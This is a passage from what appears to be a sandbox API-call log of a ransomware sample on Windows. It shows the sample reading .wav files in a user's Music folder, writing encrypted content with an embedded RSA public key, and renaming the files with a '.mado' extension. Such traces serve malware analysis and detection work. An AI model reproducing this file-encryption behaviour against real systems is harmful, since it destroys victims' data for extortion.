(HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.711] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x84e0) returned 0x3b81690 [0204.711] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80bb8 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3e8 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80c00 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe400 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe430 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.712] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe430 | out: hHeap=0x2c0000) returned 1 [0204.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe448 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe430 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bc98 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bdb0 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe430 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.713] GetCurrentThreadId () returned 0x600 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b72320 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.713] GetCurrentThreadId () returned 0x600 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe430 [0204.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe418 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe430 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe430 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bec8 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe430 | out: hHeap=0x2c0000) returned 1 [0204.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe418 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe400 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80c00 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.717] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x84d1, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x84d1, lpOverlapped=0x0) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.717] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x84d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.717] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.717] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.718] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.718] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.718] CloseHandle (hObject=0x63c) returned 1 [0204.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.719] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u02f.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u02f.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u02f.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u02f.wav.mado")) returned 1 [0204.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.719] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.720] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca11a350, ftCreationTime.dwHighDateTime=0x1d5d9b1, ftLastAccessTime.dwLowDateTime=0xc2275220, ftLastAccessTime.dwHighDateTime=0x1d5e7a3, ftLastWriteTime.dwLowDateTime=0xc2275220, ftLastWriteTime.dwHighDateTime=0x1d5e7a3, nFileSizeHigh=0x0, nFileSizeLow=0xd6bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UCaiPZ4.wav", cAlternateFileName="")) returned 1 [0204.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.720] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UCaiPZ4.wav") returned=".wav" [0204.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UCaiPZ4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ucaipz4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.721] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=54972) returned 1 [0204.721] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.723] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd696, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.723] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.724] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.724] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xd6bc, lpOverlapped=0x0) returned 1 [0204.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.725] lstrlenA (lpString="-----BEGIN PUBLIC 